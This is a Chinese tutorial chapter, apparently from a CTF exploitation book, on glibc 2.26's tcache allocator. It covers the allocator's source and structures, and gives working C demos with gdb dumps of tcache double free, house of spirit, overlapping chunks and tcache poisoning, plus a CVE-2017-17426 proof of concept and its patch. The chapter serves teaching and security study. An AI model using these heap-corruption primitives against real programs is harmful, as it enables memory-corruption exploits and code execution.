4.14 glibc tcache 机制

tcache

tcache 全名 thread local caching，它为每个线程创建一个缓存（cache），从而实现无锁的分配算法，有不错的性能提升。libc-2.26 正式提供了该机制，并默认开启，具体可以查看这次 commit。

数据结构

glibc 在编译时使用 USE_TCACHE 条件来开启 tcache 机制，并定义了下面一些东西：

#if USE_TCACHE
/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
# define TCACHE_MAX_BINS		64
# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)

/* Only used to pre-fill the tunables.  */
# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)

/* When "x" is from chunksize().  */
# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
/* When "x" is a user-provided size.  */
# define usize2tidx(x) csize2tidx (request2size (x))

/* With rounding and alignment, the bins are...
   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
   idx 1   bytes 25..40 or 13..20
   idx 2   bytes 41..56 or 21..28
   etc.  */

/* This is another arbitrary limit, which tunables can change.  Each
   tcache bin will hold at most this number of chunks.  */
# define TCACHE_FILL_COUNT 7
#endif

值得注意的比如每个线程默认使用 64 个单链表结构的 bins，每个 bins 最多存放 7 个 chunk。chunk 的大小在 64 位机器上以 16 字节递增，从 24 到 1032 字节。32 位机器上则是以 8 字节递增，从 12 到 512 字节。所以 tcache bin 只用于存放 non-large 的 chunk。

然后引入了两个新的数据结构，tcache_entry 和 tcache_perthread_struct：

/* We overlay this structure on the user-data portion of a chunk when
   the chunk is stored in the per-thread cache.  */
typedef struct tcache_entry
{
  struct tcache_entry *next;
} tcache_entry;

/* There is one of these for each thread, which contains the
   per-thread cache (hence "tcache_perthread_struct").  Keeping
   overall size low is mildly important.  Note that COUNTS and ENTRIES
   are redundant (we could have just counted the linked list each
   time), this is for performance reasons.  */
typedef struct tcache_perthread_struct
{
  char counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

static __thread tcache_perthread_struct *tcache = NULL;

tcache_perthread_struct 包含一个数组 entries，用于放置 64 个 bins，数组 counts 存放每个 bins 中的 chunk 数量。每个被放入相应 bins 中的 chunk 都会在其用户数据中包含一个 tcache_entry（FD指针），指向同 bins 中的下一个 chunk，构成单链表。

tcache 初始化操作如下：

static void
tcache_init(void)
{
  mstate ar_ptr;
  void *victim = 0;
  const size_t bytes = sizeof (tcache_perthread_struct);

  if (tcache_shutting_down)
    return;

  arena_get (ar_ptr, bytes);
  victim = _int_malloc (ar_ptr, bytes);
  if (!victim && ar_ptr != NULL)
    {
      ar_ptr = arena_get_retry (ar_ptr, bytes);
      victim = _int_malloc (ar_ptr, bytes);
    }


  if (ar_ptr != NULL)
    __libc_lock_unlock (ar_ptr->mutex);

  /* In a low memory situation, we may not be able to allocate memory
     - in which case, we just keep trying later.  However, we
     typically do this very early, so either there is sufficient
     memory, or there isn't enough memory to do non-trivial
     allocations anyway.  */
  if (victim)
    {
      tcache = (tcache_perthread_struct *) victim;
      memset (tcache, 0, sizeof (tcache_perthread_struct));
    }

}

使用

触发在 tcache 中放入 chunk 的操作：

free 时：在 fastbin 的操作之前进行，如果 chunk size 符合要求，并且对应的 bins 还未装满，则将其放进去。

#if USE_TCACHE
{
  size_t tc_idx = csize2tidx (size);

  if (tcache
&& tc_idx < mp_.tcache_bins
&& tcache->counts[tc_idx] < mp_.tcache_count)
    {
tcache_put (p, tc_idx);
return;
    }
}
#endif

malloc 时：有三个地方会触发。

如果从 fastbin 中成功返回了一个需要的 chunk，那么对应 fastbin 中的其他 chunk 会被放进相应的 tcache bin 中，直到上限。需要注意的是 chunks 在 tcache bin 的顺序和在 fastbin 中的顺序是反过来的。

#if USE_TCACHE
        /* While we're here, if we see other chunks of the same size,
  	 stash them in the tcache.  */
        size_t tc_idx = csize2tidx (nb);
        if (tcache && tc_idx < mp_.tcache_bins)
  	{
  	  mchunkptr tc_victim;

  	  /* While bin not empty and tcache not full, copy chunks.  */
  	  while (tcache->counts[tc_idx] < mp_.tcache_count
  		 && (tc_victim = *fb) != NULL)
  	    {
  	      if (SINGLE_THREAD_P)
  		*fb = tc_victim->fd;
  	      else
  		{
  		  REMOVE_FB (fb, pp, tc_victim);
  		  if (__glibc_unlikely (tc_victim == NULL))
  		    break;
  		}
  	      tcache_put (tc_victim, tc_idx);
  	    }
  	}
#endif

smallbin 中的情况与 fastbin 相似，双链表中的剩余 chunk 会被填充到 tcache bin 中，直到上限。

#if USE_TCACHE
    /* While we're here, if we see other chunks of the same size,
       stash them in the tcache.  */
    size_t tc_idx = csize2tidx (nb);
    if (tcache && tc_idx < mp_.tcache_bins)
      {
        mchunkptr tc_victim;

        /* While bin not empty and tcache not full, copy chunks over.  */
        while (tcache->counts[tc_idx] < mp_.tcache_count
  	     && (tc_victim = last (bin)) != bin)
  	{
  	  if (tc_victim != 0)
  	    {
  	      bck = tc_victim->bk;
  	      set_inuse_bit_at_offset (tc_victim, nb);
  	      if (av != &main_arena)
  		set_non_main_arena (tc_victim);
  	      bin->bk = bck;
  	      bck->fd = bin;

  	      tcache_put (tc_victim, tc_idx);
              }
  	}
      }
#endif

binning code（chunk合并等其他情况）中，每一个符合要求的 chunk 都会优先被放入 tcache，而不是直接返回（除非tcache被装满）。寻找结束后，tcache 会返回其中一个。

#if USE_TCACHE
        /* Fill cache first, return to user only if cache fills.
  	 We may return one of these chunks later.  */
        if (tcache_nb
  	  && tcache->counts[tc_idx] < mp_.tcache_count)
  	{
  	  tcache_put (victim, tc_idx);
  	  return_cached = 1;
  	  continue;
  	}
        else
  	{
#endif

触发从 tcache 中取出 chunk 的操作：

在 __libc_malloc() 调用 _int_malloc() 之前，如果 tcache bin 中有符合要求的 chunk，则直接将它返回。

#if USE_TCACHE
  /* int_free also calls request2size, be careful to not pad twice.  */
  size_t tbytes;
  checked_request2size (bytes, tbytes);
  size_t tc_idx = csize2tidx (tbytes);

  MAYBE_INIT_TCACHE ();

  DIAG_PUSH_NEEDS_COMMENT;
  if (tc_idx < mp_.tcache_bins
      /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
      && tcache
      && tcache->entries[tc_idx] != NULL)
    {
      return tcache_get (tc_idx);
    }
  DIAG_POP_NEEDS_COMMENT;
#endif

bining code 中，如果在 tcache 中放入 chunk 达到上限，则会直接返回最后一个 chunk。

#if USE_TCACHE
    /* If we've processed as many chunks as we're allowed while
   filling the cache, return one of the cached ones.  */
    ++tcache_unsorted_count;
    if (return_cached
    && mp_.tcache_unsorted_limit > 0
    && tcache_unsorted_count > mp_.tcache_unsorted_limit)
  {
    return tcache_get (tc_idx);
  }
#endif

当然默认情况下没有限制，所以这段代码也不会执行：

.tcache_unsorted_limit = 0 /* No limit.  */

binning code 结束后，如果没有直接返回（如上），那么如果有至少一个符合要求的 chunk 被找到，则返回最后一个。

#if USE_TCACHE
      /* If all the small chunks we found ended up cached, return one now.  */
      if (return_cached)
  {
    return tcache_get (tc_idx);
  }
#endif

另外还需要注意的是 tcache 中的 chunk 不会被合并，无论是相邻 chunk，还是 chunk 和 top chunk。因为这些 chunk 会被标记为 inuse。

安全性分析

tcache_put() 和 tcache_get() 分别用于从单链表中放入和取出 chunk：

/* Caller must ensure that we know tc_idx is valid and there's room
   for more chunks.  */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

/* Caller must ensure that we know tc_idx is valid and there's
   available chunks to remove.  */
static __always_inline void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  return (void *) e;
}

可以看到注释部分，它假设调用者已经对参数进行了有效性检查，然而由于对 tcache 的操作在 free 和 malloc 中往往都处于很靠前的位置，导致原来的许多有效性检查都被无视了。这样做虽然有利于提升执行效率，但对安全性造成了负面影响。

tcache_dup

#include <stdlib.h>
#include <stdio.h>

int main() {
    void *p1 = malloc(0x10);
    fprintf(stderr, "1st malloc(0x10): %p\n", p1);
    fprintf(stderr, "Freeing the first one\n");
    free(p1);
    fprintf(stderr, "Freeing the first one again\n");
    free(p1);
    fprintf(stderr, "2nd malloc(0x10): %p\n", malloc(0x10));
    fprintf(stderr, "3rd malloc(0x10): %p\n", malloc(0x10));
}

$ ./tcache_dup
1st malloc(0x10): 0x56088c39f260
Freeing the first one
Freeing the first one again
2nd malloc(0x10): 0x56088c39f260
3rd malloc(0x10): 0x56088c39f260

tcache_dup 与 fastbin_dup 类似，但其实更加简单，因为它并不局限于 fastbin，只要在 tcache chunk 范围内的都可以，而且 double-free 也不再需要考虑 top 的问题，直接 free 两次就可以了。然后我们就可以得到相同的 chunk。

第一次 free 后：

gdb-peda$ x/4gx 0x0000555555756260-0x10
0x555555756250: 0x0000000000000000      0x0000000000000021
0x555555756260: 0x0000000000000000      0x0000000000000000
gdb-peda$ vmmap heap
Start              End                Perm      Name
0x0000555555756000 0x0000555555777000 rw-p      [heap]
gdb-peda$ x/10gx 0x0000555555756000+0x10
0x555555756010: 0x0000000000000001      0x0000000000000000  <-- counts
0x555555756020: 0x0000000000000000      0x0000000000000000
0x555555756030: 0x0000000000000000      0x0000000000000000
0x555555756040: 0x0000000000000000      0x0000000000000000
0x555555756050: 0x0000555555756260      0x0000000000000000  <-- entries

chunk 被放入相应的 tcache bin 中，可以看到该 tcache bin 的 counts 被设为 1，表示有 1 个 chunk，入口为 0x0000555555756260。

第二次 free 后：

gdb-peda$ x/4gx 0x0000555555756260-0x10
0x555555756250: 0x0000000000000000      0x0000000000000021  <-- chunk 1 [double freed]
0x555555756260: 0x0000555555756260      0x0000000000000000
gdb-peda$ x/10gx 0x0000555555756000+0x10
0x555555756010: 0x0000000000000002      0x0000000000000000  <-- counts
0x555555756020: 0x0000000000000000      0x0000000000000000
0x555555756030: 0x0000000000000000      0x0000000000000000
0x555555756040: 0x0000000000000000      0x0000000000000000
0x555555756050: 0x0000555555756260      0x0000000000000000  <-- entries

counts 变成 2，入口不变，表示 tcache bin 已经有两个 chunk 了，虽然是相同的。

两次 malloc 后：

gdb-peda$ x/10gx 0x0000555555756000+0x10
0x555555756010: 0x0000000000000000      0x0000000000000000  <-- counts
0x555555756020: 0x0000000000000000      0x0000000000000000
0x555555756030: 0x0000000000000000      0x0000000000000000
0x555555756040: 0x0000000000000000      0x0000000000000000
0x555555756050: 0x0000555555756260      0x0000000000000000

于是我们得到了两个指向同一块内存区域的指针。

tcache_house_of_spirit

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main() {
    malloc(1);  // init heap

    fprintf(stderr, "We will overwrite a pointer to point to a fake 'smallbin' region.\n");
    unsigned long long *a, *b;
    unsigned long long fake_chunk[64] __attribute__ ((aligned (16)));

    fprintf(stderr, "The chunk:  %p\n", &fake_chunk[0]);

    fake_chunk[1] = 0x110;  // the size
    memset(fake_chunk+2, 0x41, sizeof(fake_chunk)-0x10);

    fprintf(stderr, "Overwritting our pointer with the address of the fake region inside the fake chunk, %p.\n", &fake_chunk[0]);
    a = &fake_chunk[2];

    fprintf(stderr, "Freeing the overwritten pointer.\n");
    free(a);

    fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunk[0], &fake_chunk[2]);
    b = malloc(0x100);
    memset(fake_chunk+2, 0x42, sizeof(fake_chunk)-0x10);
    fprintf(stderr, "malloc(0x100): %p\n", b);
}

$ ./tcache_house_of_spirit
We will overwrite a pointer to point to a fake 'smallbin' region.
The chunk:  0x7fffffffdb00
Overwritting our pointer with the address of the fake region inside the fake chunk, 0x7fffffffdb00.
Freeing the overwritten pointer.
Now the next malloc will return the region of our fake chunk at 0x7fffffffdb00, which will be 0x7fffffffdb10!
malloc(0x100): 0x7fffffffdb10

tcache 在释放堆块时没有对其前后堆块进行合法性校验，只需要本块对齐（2*SIZE_SZ）就可以将堆块释放到 tcache 中，而在申请时，tcache 对内部大小合适的堆块也是直接分配的，导致常见的 house_of_spirit 可以延伸到 smallbin，而且比以前更加简单。

在栈上构造 fake chunk，大小为 smallbin：

gdb-peda$ x/10gx fake_chunk
0x7fffffffdad0: 0x0000000000000000      0x0000000000000110  <-- fake chunk
0x7fffffffdae0: 0x4141414141414141      0x4141414141414141
0x7fffffffdaf0: 0x4141414141414141      0x4141414141414141
0x7fffffffdb00: 0x4141414141414141      0x4141414141414141
0x7fffffffdb10: 0x4141414141414141      0x4141414141414141

free 掉之后，该 fake chunk 被放进 tcache bin：

gdb-peda$ x/10gx fake_chunk
0x7fffffffdad0: 0x0000000000000000      0x0000000000000110  <-- fake chunk [be freed]
0x7fffffffdae0: 0x0000000000000000      0x4141414141414141
0x7fffffffdaf0: 0x4141414141414141      0x4141414141414141
0x7fffffffdb00: 0x4141414141414141      0x4141414141414141
0x7fffffffdb10: 0x4141414141414141      0x4141414141414141
gdb-peda$ vmmap heap
Start              End                Perm      Name
0x0000555555756000 0x0000555555777000 rw-p      [heap]
gdb-peda$ x/30gx 0x0000555555756000+0x10
0x555555756010: 0x0000000000000000      0x0100000000000000  <-- counts
0x555555756020: 0x0000000000000000      0x0000000000000000
0x555555756030: 0x0000000000000000      0x0000000000000000
0x555555756040: 0x0000000000000000      0x0000000000000000
0x555555756050: 0x0000000000000000      0x0000000000000000
0x555555756060: 0x0000000000000000      0x0000000000000000
0x555555756070: 0x0000000000000000      0x0000000000000000
0x555555756080: 0x0000000000000000      0x0000000000000000
0x555555756090: 0x0000000000000000      0x0000000000000000
0x5555557560a0: 0x0000000000000000      0x0000000000000000
0x5555557560b0: 0x0000000000000000      0x0000000000000000
0x5555557560c0: 0x0000000000000000      0x00007fffffffdae0  <-- entries
0x5555557560d0: 0x0000000000000000      0x0000000000000000
0x5555557560e0: 0x0000000000000000      0x0000000000000000
0x5555557560f0: 0x0000000000000000      0x0000000000000000

最后 malloc 即可将 fake chunk 取出来：

gdb-peda$ p b
$1 = (unsigned long long *) 0x7fffffffdae0
gdb-peda$ p a
$2 = (unsigned long long *) 0x7fffffffdae0
gdb-peda$ x/10gx fake_chunk
0x7fffffffdad0: 0x0000000000000000      0x0000000000000110  <-- new chunk
0x7fffffffdae0: 0x4242424242424242      0x4242424242424242
0x7fffffffdaf0: 0x4242424242424242      0x4242424242424242
0x7fffffffdb00: 0x4242424242424242      0x4242424242424242
0x7fffffffdb10: 0x4242424242424242      0x4242424242424242

于是我们就在得到了一个在栈上的 chunk。

tcache_overlapping_chunks

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>

int main() {
    intptr_t *p1, *p2, *p3;

    p1 = malloc(0x50 - 8);
    p2 = malloc(0x20 - 8);
    memset(p1, 0x41, 0x50-8);
    memset(p2, 0x41, 0x30-8);
    fprintf(stderr, "Allocated victim chunk with requested size 0x48: %p\n", p1);
    fprintf(stderr, "Allocated sentry element after victim: %p\n", p2);

    int evil_chunk_size = 0x110;
    int evil_region_size = 0x110 - 8;
    fprintf(stderr, "Emulating corruption of the victim's size to 0x110\n");
    *(p1-1) = evil_chunk_size;
    fprintf(stderr, "Freed victim chunk to put it in a different tcache bin\n");
    free(p1);

    p3 = malloc(evil_region_size);
    memset(p3, 0x42, evil_region_size);
    fprintf(stderr, "Requested a chunk of 0x100 bytes\n");
    fprintf(stderr, "p3: %p ~ %p\n", p3, (char *)p3+evil_region_size);
    fprintf(stderr, "p2: %p ~ %p\n", p2, (char *)p2+0x20-8);
}

$ ./tcache_overlapping_chunks
Allocated victim chunk with requested size 0x48: 0x555555756260
Allocated sentry element after victim: 0x5555557562b0
Emulating corruption of the victim's size to 0x110
Freed victim chunk to put it in a different tcache bin
Requested a chunk of 0x100 bytes
p3: 0x555555756260 ~ 0x555555756368
p2: 0x5555557562b0 ~ 0x5555557562c8

在 _int_free() 时，libc 完全没有对 chunk 进行检查，所以我们可以直接修改其 size，在 free 时该 chunk 就被放进了不同的 tcache bin。在下一次 malloc 时得到不一样大小的 chunk，造成堆块重叠。

首先我们分配两个 chunk：

gdb-peda$ x/16gx 0x555555756260-0x10
0x555555756250: 0x0000000000000000      0x0000000000000051  <-- chunk p1
0x555555756260: 0x4141414141414141      0x4141414141414141
0x555555756270: 0x4141414141414141      0x4141414141414141
0x555555756280: 0x4141414141414141      0x4141414141414141
0x555555756290: 0x4141414141414141      0x4141414141414141
0x5555557562a0: 0x4141414141414141      0x0000000000000021  <-- chunk p2
0x5555557562b0: 0x4141414141414141      0x4141414141414141
0x5555557562c0: 0x4141414141414141      0x0000000000000411

然后修改第一个的 size 并将其释放：

gdb-peda$ x/16gx 0x555555756260-0x10
0x555555756250: 0x0000000000000000      0x0000000000000110  <-- chunk p1 [be freed]
0x555555756260: 0x0000000000000000      0x4141414141414141
0x555555756270: 0x4141414141414141      0x4141414141414141
0x555555756280: 0x4141414141414141      0x4141414141414141
0x555555756290: 0x4141414141414141      0x4141414141414141
0x5555557562a0: 0x4141414141414141      0x0000000000000021  <-- chunk p2
0x5555557562b0: 0x4141414141414141      0x4141414141414141
0x5555557562c0: 0x4141414141414141      0x0000000000000411
gdb-peda$ vmmap heap
Start              End                Perm      Name
0x0000555555756000 0x0000555555777000 rw-p      [heap]
gdb-peda$ x/30gx 0x0000555555756000+0x10
0x555555756010: 0x0000000000000000      0x0100000000000000  <-- counts
0x555555756020: 0x0000000000000000      0x0000000000000000
0x555555756030: 0x0000000000000000      0x0000000000000000
0x555555756040: 0x0000000000000000      0x0000000000000000
0x555555756050: 0x0000000000000000      0x0000000000000000
0x555555756060: 0x0000000000000000      0x0000000000000000
0x555555756070: 0x0000000000000000      0x0000000000000000
0x555555756080: 0x0000000000000000      0x0000000000000000
0x555555756090: 0x0000000000000000      0x0000000000000000
0x5555557560a0: 0x0000000000000000      0x0000000000000000
0x5555557560b0: 0x0000000000000000      0x0000000000000000
0x5555557560c0: 0x0000000000000000      0x0000555555756260  <-- entries
0x5555557560d0: 0x0000000000000000      0x0000000000000000
0x5555557560e0: 0x0000000000000000      0x0000000000000000
0x5555557560f0: 0x0000000000000000      0x0000000000000000

可以看到 chunk p1 并没有放到它应该去的 tcache bin 中，而是放到了修改 size 后对应的 tcache bin。

最后将其 malloc 出来：

gdb-peda$ p p3
$1 = (intptr_t *) 0x555555756260
gdb-peda$ p p2
$2 = (intptr_t *) 0x5555557562b0
gdb-peda$ p p1
$3 = (intptr_t *) 0x555555756260
gdb-peda$ x/36gx 0x555555756260-0x10
0x555555756250: 0x0000000000000000      0x0000000000000110  <-- chunk p3
0x555555756260: 0x4242424242424242      0x4242424242424242
0x555555756270: 0x4242424242424242      0x4242424242424242
0x555555756280: 0x4242424242424242      0x4242424242424242
0x555555756290: 0x4242424242424242      0x4242424242424242
0x5555557562a0: 0x4242424242424242      0x4242424242424242  <-- chunk p2
0x5555557562b0: 0x4242424242424242      0x4242424242424242
0x5555557562c0: 0x4242424242424242      0x4242424242424242
0x5555557562d0: 0x4242424242424242      0x4242424242424242
0x5555557562e0: 0x4242424242424242      0x4242424242424242
0x5555557562f0: 0x4242424242424242      0x4242424242424242
0x555555756300: 0x4242424242424242      0x4242424242424242
0x555555756310: 0x4242424242424242      0x4242424242424242
0x555555756320: 0x4242424242424242      0x4242424242424242
0x555555756330: 0x4242424242424242      0x4242424242424242
0x555555756340: 0x4242424242424242      0x4242424242424242
0x555555756350: 0x4242424242424242      0x4242424242424242
0x555555756360: 0x4242424242424242      0x0000000000000000

于是 chunk p2 被 chunk p3 覆盖了。

tcache_poisoning

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>

int main() {
    intptr_t *p1, *p2, *p3;
    size_t target[10];
    printf("Our target is a stack region at %p\n", (void *)target);

    p1 = malloc(0x30);
    memset(p1, 0x41, 0x30+8);
    fprintf(stderr, "Allocated victim chunk with requested size 0x30 at %p\n", p1);

    fprintf(stderr, "Freed victim chunk to put it in a tcache bin\n");
    free(p1);
    fprintf(stderr, "Emulating corruption of the next ptr\n");
    *p1 = (int64_t)target;

    fprintf(stderr, "Now we make two requests for the appropriate size so that malloc returns a chunk overlapping our target\n");
    p2 = malloc(0x30);
    memset(p2, 0x42, 0x30+8);
    p3 = malloc(0x30);
    memset(p3, 0x42, 0x30+8);
    fprintf(stderr, "The first malloc(0x30) returned %p, the second one: %p\n", p2, p3);
}

$ ./tcache_poisoning
Our target is a stack region at 0x7fffffffdcc0
Allocated victim chunk with requested size 0x30 at 0x555555756670
Freed victim chunk to put it in a tcache bin
Emulating corruption of the next ptr
Now we make two requests for the appropriate size so that malloc returns a chunk overlapping our target
The first malloc(0x30) returned 0x555555756670, the second one: 0x7fffffffdcc0

该实例通过破坏 tcache bin 中 chunk 的 fd 指针，将其指向不同的位置，从而改变 tcache_entry 的 next 指针，在 malloc 时在任意位置得到 chunk。而 tcache_get() 函数没有对此做任何的检查。

分配一个 chunk p1 后释放，该 chunk 将被放入相应的 tcache bin，其 fd 指针被清空：

gdb-peda$ x/10gx (void *)p1-0x10
0x555555756660: 0x0000000000000000      0x0000000000000041  <-- chunk p1 [be freed]
0x555555756670: 0x0000000000000000      0x4141414141414141    <-- fd pointer
0x555555756680: 0x4141414141414141      0x4141414141414141
0x555555756690: 0x4141414141414141      0x4141414141414141
0x5555557566a0: 0x4141414141414141      0x0000000000020961
gdb-peda$ vmmap heap
Start              End                Perm      Name
0x0000555555756000 0x0000555555777000 rw-p      [heap]
gdb-peda$ x/12gx 0x0000555555756000+0x10
0x555555756010: 0x0000000000010000      0x0000000000000000  <-- counts
0x555555756020: 0x0000000000000000      0x0000000000000000
0x555555756030: 0x0000000000000000      0x0000000000000000
0x555555756040: 0x0000000000000000      0x0000000000000000
0x555555756050: 0x0000000000000000      0x0000000000000000
0x555555756060: 0x0000555555756670      0x0000000000000000  <-- entries

然后修改 fd 指针指向栈上的地址 target：

gdb-peda$ x/10gx (void *)p1-0x10
0x555555756660: 0x0000000000000000      0x0000000000000041  <-- chunk p1 [be freed]
0x555555756670: 0x00007fffffffdc80      0x4141414141414141    <-- fd pointer
0x555555756680: 0x4141414141414141      0x4141414141414141
0x555555756690: 0x4141414141414141      0x4141414141414141
0x5555557566a0: 0x4141414141414141      0x0000000000020961

接下来的第一次 malloc 将 chunk p1 的地方取出：

gdb-peda$ x/10gx (void *)p1-0x10
0x555555756660: 0x0000000000000000      0x0000000000000041  <-- chunk p2
0x555555756670: 0x4242424242424242      0x4242424242424242
0x555555756680: 0x4242424242424242      0x4242424242424242
0x555555756690: 0x4242424242424242      0x4242424242424242
0x5555557566a0: 0x4242424242424242      0x0000000000020961
gdb-peda$ x/12gx 0x0000555555756000+0x10
0x555555756010: 0x0000000000000000      0x0000000000000000
0x555555756020: 0x0000000000000000      0x0000000000000000
0x555555756030: 0x0000000000000000      0x0000000000000000
0x555555756040: 0x0000000000000000      0x0000000000000000
0x555555756050: 0x0000000000000000      0x0000000000000000
0x555555756060: 0x00007fffffffdc80      0x0000000000000000  <-- entries

可以看到 tcache 的 entries 被修改为我们伪造的 fd 地址。

第二次 malloc，虽然 tcache bin 的 counts 为 0，但它并没有做检查，直接在 entries 指向的地方返回了一个 chunk：

gdb-peda$ x/10gx (void *)p3-0x10
0x7fffffffdc70: 0x0000555555756670      0x00007fffffffdc80  <-- chunk p3
0x7fffffffdc80: 0x4242424242424242      0x4242424242424242
0x7fffffffdc90: 0x4242424242424242      0x4242424242424242
0x7fffffffdca0: 0x4242424242424242      0x4242424242424242
0x7fffffffdcb0: 0x4242424242424242      0x0000000000000000

于是我们得到了一个在栈上的 chunk。

有趣的是 tcache bin 的 counts 居然产生了整数溢出（0x00-1=0xff）：

gdb-peda$ x/12gx 0x0000555555756000+0x10
0x555555756010: 0x0000000000ff0000      0x0000000000000000
0x555555756020: 0x0000000000000000      0x0000000000000000
0x555555756030: 0x0000000000000000      0x0000000000000000
0x555555756040: 0x0000000000000000      0x0000000000000000
0x555555756050: 0x0000000000000000      0x0000000000000000
0x555555756060: 0x00000000000000c2      0x0000000000000000

看来这个机制仍然存在很多的问题啊。

注：突然发现这个 0xff 在 unsorted bin attack 里有很巧妙的用处，参考章节 3.1.8。

这一节的代码可以在这里找到。其他的一些情况可以参考章节 3.3.6。

CTF 实例

在最近的 CTF 中，已经开始尝试使用 libc-2.26，比如章节 6.1.15、6.1.19 中的例子。

CVE-2017-17426

libc-2.26 中的 tcache 机制被发现了安全漏洞，由于 __libc_malloc() 使用 request2size() 来将所请求的分配大小转换为计算块大小，该函数不会进行整数溢出检查。所以如果请求一个非常大的堆块（接近 SIZE_MAX），将会导致整数溢出，从而导致 malloc 错误地返回了 tcache bin 里的堆块。

一个例子：

#include <stdio.h>
#include <stdlib.h>

int main() {
    void *x = malloc(10);
    printf("malloc(10): %p\n", x);
    free(x);

    void *y = malloc(((size_t)~0) - 2); // overflow allocation (size_t.max-2)
    printf("malloc(((size_t)~0) - 2): %p\n", y);
}

$ gcc cve201717426.c
$ /usr/local/glibc-2.26/lib/ld-2.26.so ./a.out
malloc(10): 0x7f3f945ed260
malloc(((size_t)~0) - 2): 0x7f3f945ed260
$ /usr/local/glibc-2.27/lib/ld-2.27.so ./a.out
malloc(10): 0x7f399c69e260
malloc(((size_t)~0) - 2): (nil)

可以看到在使用 libc-2.26 时，第二次 malloc 返回了第一次 free 的堆块。而在使用 libc-2.27 时返回 NULL，说明该问题已被修复。

patch

该漏洞在 libc-2.27 的这次 commit 中被修复。方法是用更安全的 checked_request2size() 替换 request2size()，以实现对整数溢出的检查：

$ git show 34697694e8a93b325b18f25f7dcded55d6baeaf6 malloc/malloc.c | cat
commit 34697694e8a93b325b18f25f7dcded55d6baeaf6
Author: Arjun Shankar <arjun@redhat.com>
Date:   Thu Nov 30 13:31:45 2017 +0100

    Fix integer overflow in malloc when tcache is enabled [BZ #22375]

    When the per-thread cache is enabled, __libc_malloc uses request2size (which
    does not perform an overflow check) to calculate the chunk size from the
    requested allocation size. This leads to an integer overflow causing malloc
    to incorrectly return the last successfully allocated block when called with
    a very large size argument (close to SIZE_MAX).

    This commit uses checked_request2size instead, removing the overflow.

diff --git a/malloc/malloc.c b/malloc/malloc.c
index 79f0e9eac7..0c9e0748b4 100644
--- a/malloc/malloc.c
+++ b/malloc/malloc.c
@@ -3031,7 +3031,8 @@ __libc_malloc (size_t bytes)
     return (*hook)(bytes, RETURN_ADDRESS (0));
 #if USE_TCACHE
   /* int_free also calls request2size, be careful to not pad twice.  */
-  size_t tbytes = request2size (bytes);
+  size_t tbytes;
+  checked_request2size (bytes, tbytes);
   size_t tc_idx = csize2tidx (tbytes);

   MAYBE_INIT_TCACHE ();

参考资料

Previous4.13 利用 _IO_FILE 结构 Next4.15 利用 vsyscall 和 vDSO

Last updated 4 years ago

hashtagtcache

hashtag数据结构

hashtag使用

hashtag安全性分析

hashtagtcache_dup

hashtagtcache_house_of_spirit

hashtagtcache_overlapping_chunks

hashtagtcache_poisoning

hashtagCTF 实例

hashtagCVE-2017-17426

hashtagpatch

hashtag参考资料